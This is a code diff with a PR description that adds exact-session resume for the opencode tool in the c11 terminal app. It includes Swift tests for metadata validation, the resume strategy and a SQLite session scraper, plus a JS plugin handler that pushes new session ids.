+        }
+    }
+
+    func testStoreRejectsNonStringSessionId() {
+        let workspace = UUID(); let surface = UUID()
+        defer { store.removeSurface(workspaceId: workspace, surfaceId: surface) }
+        XCTAssertThrowsError(try store.setMetadata(
+            workspaceId: workspace, surfaceId: surface,
+            partial: ["opencode.session_id": 42],
+            mode: .merge, source: .explicit
+        )) { error in
+            guard let e = error as? SurfaceMetadataStore.WriteError else {
+                return XCTFail("expected WriteError, got \(error)")
+            }
+            XCTAssertEqual(e.code, "reserved_key_invalid_type")
+        }
+    }
+
+    func testStoreRejectsRelativeProjectDir() {
+        let workspace = UUID(); let surface = UUID()
+        defer { store.removeSurface(workspaceId: workspace, surfaceId: surface) }
+        XCTAssertThrowsError(try store.setMetadata(
+            workspaceId: workspace, surfaceId: surface,
+            partial: ["opencode.session_project_dir": "not/absolute"],
+            mode: .merge, source: .explicit
+        )) { error in
+            guard let e = error as? SurfaceMetadataStore.WriteError else {
+                return XCTFail("expected WriteError, got \(error)")
+            }
+            XCTAssertEqual(e.code, "reserved_key_invalid_type")
+        }
+    }
+}
+
+// MARK: - Strategy
+
+private struct StubLookup: OpencodeSessionLookup {
+    let result: Bool?
+    func sessionExists(id: String) -> Bool? { result }
+}
+
+final class OpencodeStrategyResumeTests: XCTestCase {
+
+    private let id = "ses_0fda89a49ffeLHwJXtrxnn4X6g"
+    private let cwd = "/Users/atin/Projects/proj"
+
+    private func ref(state: ConversationState, placeholder: Bool = false, cwd: String? = nil) -> ConversationRef {
+        ConversationRef(kind: "opencode", id: id, placeholder: placeholder, cwd: cwd,
+                        capturedVia: .hook, state: state)
+    }
+
+    func testResumeSkipsPlaceholder() {
+        let s = OpencodeStrategy()
+        guard case .skip = s.resume(ref: ref(state: .alive, placeholder: true)) else {
+            return XCTFail("placeholder must skip")
+        }
+    }
+
+    func testResumeSkipsUnknownAndTombstoned() {
+        let s = OpencodeStrategy()
+        guard case .skip = s.resume(ref: ref(state: .unknown)) else { return XCTFail("unknown must skip") }
+        guard case .skip = s.resume(ref: ref(state: .tombstoned)) else { return XCTFail("tombstoned must skip") }
+    }
+
+    func testResumeWithCwdEmitsCdPrefix() {
+        let s = OpencodeStrategy()
+        guard case let .typeCommand(text, submit) = s.resume(ref: ref(state: .alive, cwd: cwd)) else {
+            return XCTFail("alive+cwd must typeCommand")
+        }
+        XCTAssertTrue(submit)
+        XCTAssertEqual(text, "cd '/Users/atin/Projects/proj' && opencode -s 'ses_0fda89a49ffeLHwJXtrxnn4X6g'")
+    }
+
+    func testResumeWithoutCwdHasNoCdPrefix() {
+        let s = OpencodeStrategy()
+        guard case let .typeCommand(text, _) = s.resume(ref: ref(state: .suspended)) else {
+            return XCTFail("suspended must typeCommand")
+        }
+        XCTAssertEqual(text, "opencode -s 'ses_0fda89a49ffeLHwJXtrxnn4X6g'")
+        XCTAssertFalse(text.contains("--dangerously-skip-permissions"),
+                       "interactive resume must not use the run-only flag")
+    }
+
+    func testResumeSkipsInvalidId() {
+        let s = OpencodeStrategy()
+        let bad = ConversationRef(kind: "opencode", id: "ses_bad", placeholder: false,
+                                  cwd: cwd, capturedVia: .hook, state: .alive)
+        guard case .skip = s.resume(ref: bad) else { return XCTFail("invalid id must skip") }
+    }
+
+    func testCapturePushPrimaryWins() {
+        let s = OpencodeStrategy()
+        let push = ConversationRef(kind: "opencode", id: id, placeholder: false,
+                                   cwd: cwd, capturedVia: .hook, state: .alive)
+        let claim = ConversationRef(kind: "opencode", id: id, placeholder: true,
+                                    cwd: cwd, capturedVia: .wrapperClaim, state: .alive)
+        let out = s.capture(inputs: ConversationStrategyInputs(
+            surfaceId: "s", cwd: cwd, wrapperClaim: claim, push: push))
+        XCTAssertEqual(out?.capturedVia, .hook)
+        XCTAssertEqual(out?.id, id)
+    }
+
+    func testCaptureFallsBackToWrapperClaim() {
+        let s = OpencodeStrategy()
+        let claim = ConversationRef(kind: "opencode", id: id, placeholder: true,
+                                    cwd: cwd, capturedVia: .wrapperClaim, state: .alive)
+        let out = s.capture(inputs: ConversationStrategyInputs(
+            surfaceId: "s", cwd: cwd, wrapperClaim: claim, push: nil))
+        XCTAssertEqual(out?.capturedVia, .wrapperClaim)
+    }
+
+    func testCaptureScrapeCandidateYieldsUnknownState() {
+        let s = OpencodeStrategy()
+        let cand = ScrapeCandidate(id: id, filePath: "", mtime: Date(), size: 0, cwd: cwd)
+        let out = s.capture(inputs: ConversationStrategyInputs(
+            surfaceId: "s", cwd: cwd, scrapeCandidates: [cand]))
+        XCTAssertEqual(out?.state, .unknown)
+        XCTAssertEqual(out?.capturedVia, .scrape)
+    }
+
+    func testIsValidId() {
+        XCTAssertTrue(OpencodeStrategy().isValidId(id))
+        XCTAssertFalse(OpencodeStrategy().isValidId("ses_bad"))
+    }
+
+    func testTranscriptExistsThreeValued() {
+        let r = ref(state: .suspended, cwd: cwd)
+        let fs = DefaultConversationFilesystem()
+        XCTAssertEqual(OpencodeStrategy(sessionLookup: { _ in StubLookup(result: true) }).transcriptExists(for: r, filesystem: fs), true)
+        XCTAssertEqual(OpencodeStrategy(sessionLookup: { _ in StubLookup(result: false) }).transcriptExists(for: r, filesystem: fs), false)
+        XCTAssertNil(OpencodeStrategy(sessionLookup: { _ in StubLookup(result: nil) }).transcriptExists(for: r, filesystem: fs))
+    }
+}
+
+// MARK: - Scraper (real temp SQLite DB)
+
+final class OpencodeScraperTests: XCTestCase {
+
+    private var tmpHome: URL!
+
+    override func setUpWithError() throws {
+        tmpHome = FileManager.default.temporaryDirectory
+            .appendingPathComponent("c11-opencode-test-\(UUID().uuidString)", isDirectory: true)
+    }
+
+    override func tearDownWithError() throws {
+        if let tmpHome { try? FileManager.default.removeItem(at: tmpHome) }
+    }
+
+    /// Lay out `<tmpHome>/.local/share/opencode/opencode.db` with a `session`
+    /// table and the given rows. Mirrors the real column names the scraper
+    /// queries (`id`, `parent_id`, `directory`, `time_updated`).
+    private func seedDatabase(_ rows: [(id: String, dir: String, updatedMs: Int64)]) throws {
+        let dbDir = tmpHome
+            .appendingPathComponent(".local/share/opencode", isDirectory: true)
+        try FileManager.default.createDirectory(at: dbDir, withIntermediateDirectories: true)
+        let dbPath = dbDir.appendingPathComponent("opencode.db").path
+
+        var db: OpaquePointer?
+        XCTAssertEqual(sqlite3_open(dbPath, &db), SQLITE_OK)
+        defer { sqlite3_close(db) }
+        let ddl = "CREATE TABLE session (id TEXT PRIMARY KEY, parent_id TEXT, directory TEXT NOT NULL, time_updated INTEGER NOT NULL);"
+        XCTAssertEqual(sqlite3_exec(db, ddl, nil, nil, nil), SQLITE_OK)
+        for r in rows {
+            let sql = "INSERT INTO session (id, parent_id, directory, time_updated) VALUES ('\(r.id)', NULL, '\(r.dir)', \(r.updatedMs));"
+            XCTAssertEqual(sqlite3_exec(db, sql, nil, nil, nil), SQLITE_OK, "insert \(r.id)")
+        }
+    }
+
+    func testDatabasePathNilWhenAbsent() {
+        let scraper = OpencodeScraper(homeDirectory: tmpHome)
+        XCTAssertNil(scraper.databasePath(), "no db file yet")
+    }
+
+    func testSessionExistsTrueFalseNil() throws {
+        let present = "ses_0fda89a49ffeLHwJXtrxnn4X6g"
+        let absent  = "ses_0f5b10b09ffeb2G3Y53oze86wV"
+        try seedDatabase([(present, "/Users/atin/proj", 1_700_000_000_000)])
+        let scraper = OpencodeScraper(homeDirectory: tmpHome)
+
+        XCTAssertEqual(scraper.sessionExists(id: present), true)
+        XCTAssertEqual(scraper.sessionExists(id: absent), false)
+        XCTAssertNil(scraper.sessionExists(id: "not-a-valid-id"), "bad grammar → nil")
+
+        // DB absent → nil (cannot verify), not false.
+        let noDb = OpencodeScraper(homeDirectory: FileManager.default.temporaryDirectory
+            .appendingPathComponent("c11-no-db-\(UUID().uuidString)", isDirectory: true))
+        XCTAssertNil(noDb.sessionExists(id: present))
+    }
+
+    func testScrapeFiltersByCwdNewestFirst() throws {
+        let dir = "/Users/atin/proj"
+        try seedDatabase([
+            ("ses_0fda89a49ffeLHwJXtrxnn4X6g", dir, 100),
+            ("ses_0fd8a6fffffe6JzzcloHmtDV0R", dir, 300),   // newest in dir
+            ("ses_0fd8cb310ffe2of6OsP2qYz4Q5", "/Users/atin/other", 999)  // different cwd
+        ])
+        let scraper = OpencodeScraper(homeDirectory: tmpHome)
+        let refs = scraper.scrape(cwd: dir)
+        XCTAssertEqual(refs.map(\.id), [
+            "ses_0fd8a6fffffe6JzzcloHmtDV0R",
+            "ses_0fda89a49ffeLHwJXtrxnn4X6g"
+        ])
+        XCTAssertTrue(refs.allSatisfy { $0.cwd == dir })
+        XCTAssertTrue(refs.allSatisfy { $0.capturedVia == .scrape })
+    }
+
+    func testScrapeEmptyForUnknownCwd() throws {
+        try seedDatabase([("ses_0fda89a49ffeLHwJXtrxnn4X6g", "/a", 1)])
+        let scraper = OpencodeScraper(homeDirectory: tmpHome)
+        XCTAssertEqual(scraper.scrape(cwd: "/nonexistent"), [])
+    }
+}

--- a/skills/opencode-plugins/c11-notify.js
+++ b/skills/opencode-plugins/c11-notify.js
@@ -32,6 +32,30 @@ export const C11NotifyPlugin = async ({ $ }) => {
   return {
     event: async ({ event }) => {
       switch (event.type) {
+        case "session.created": {
+          // Exact-session resume rail (C11-151). Push the new opencode
+          // session id to c11's conversation store so a quit+relaunch
+          // re-attaches the surface to THIS session via `opencode -s <id>`.
+          // Root sessions only — a sub-agent session (parentID set) must
+          // not clobber the surface's primary conversation id. opencode
+          // session ids are `ses_` + 26-char base62; the c11 CLI
+          // revalidates the grammar before storing.
+          const info = event.properties?.info;
+          if (info?.id && !info.parentID) {
+            const args = [
+              "conversation", "push",
+              "--kind", "opencode",
+              "--id", info.id,
+              "--source", "hook",
+              "--state", "alive",
+            ];
+            if (info.directory) {
+              args.push("--cwd", info.directory);
+            }
+            await c11(args);
+          }
+          break;
+        }
         case "session.idle":
           await notify("OpenCode", "Waiting for input");
           await c11(["set-metadata", "--key", "status", "--value", "idle"]);


### PR DESCRIPTION
## Summary

Phase A of `docs/agent-exact-resume-plan.md`: exact-session resume for **opencode** via its plugin push rail. When you run `opencode` in a c11 terminal and later quit + relaunch c11 with session resume, the restored surface re-attaches to the **exact** prior session (`cd '<dir>' && opencode -s '<id>'`) instead of launching fresh.

## What's here

- **Reserved keys** `opencode.session_id` (grammar `^ses_[0-9A-Za-z]{26}$`, **base62**) + `opencode.session_project_dir`, validated at the `SurfaceMetadataStore` boundary.
- **Plugin handler**: `c11-notify.js` `session.created` → `c11 conversation push --kind opencode`. Root sessions only (`!info.parentID`) so a sub-agent session can't clobber the surface's primary conversation.
- **`OpencodeStrategy`** (replaces the placeholder): push-primary capture, `cd '<dir>' && opencode -s '<id>'` resume, base62 `isValidId`, three-valued `transcriptExists`.
- **`OpencodeScraper`**: read-only, stat-equivalent SQLite reader over `~/.local/share/opencode/opencode.db` — crash-recovery fallback + `transcriptExists` backing.
- **`state verify` oracle** extended for opencode (was claude-code-only).
- **26 c11-logic tests** (grammar incl. the I/L/O/U regression guard, reserved-key validation, strategy resume/capture, real-SQLite scraper).

## The load-bearing fix

The WIP `feat/opencode-resume` used a **Crockford-base32** regex (`[0-9A-HJKMNP-TV-Za-hjkmnp-tv-z]`) which excludes `I/L/O/U`. Verified against a live opencode store: **83 of 131 session ids contain those letters** — Crockford would reject 63% of real sessions. base62 is correct and necessary. `--dangerously-skip-permissions` is `opencode run`-only (not the interactive TUI per `opencode --help`), so resume uses bare `opencode -s <id>`.

## Validation (observed live resume)

Tagged build, real opencode session `ses_0ef1b49a5ffePvUOJN5jYpSdAM` (contains `U`/`O`): captured via the plugin (`source=hook`), persisted to snapshot, quit + relaunch → **opencode re-attached to the exact session with its prior history visible**; the restore ran the SQLite `transcriptExists` ("transcript verified on disk") and `state verify` prints `cd '/Users/atin/c11-151-resume-proj' && opencode -s 'ses_0ef1b49a5ffePvUOJN5jYpSdAM'`. Full evidence in the ticket's validation artifact.

Ticket: C11-151

🤖 Generated with [Claude Code](https://claude.com/claude-code)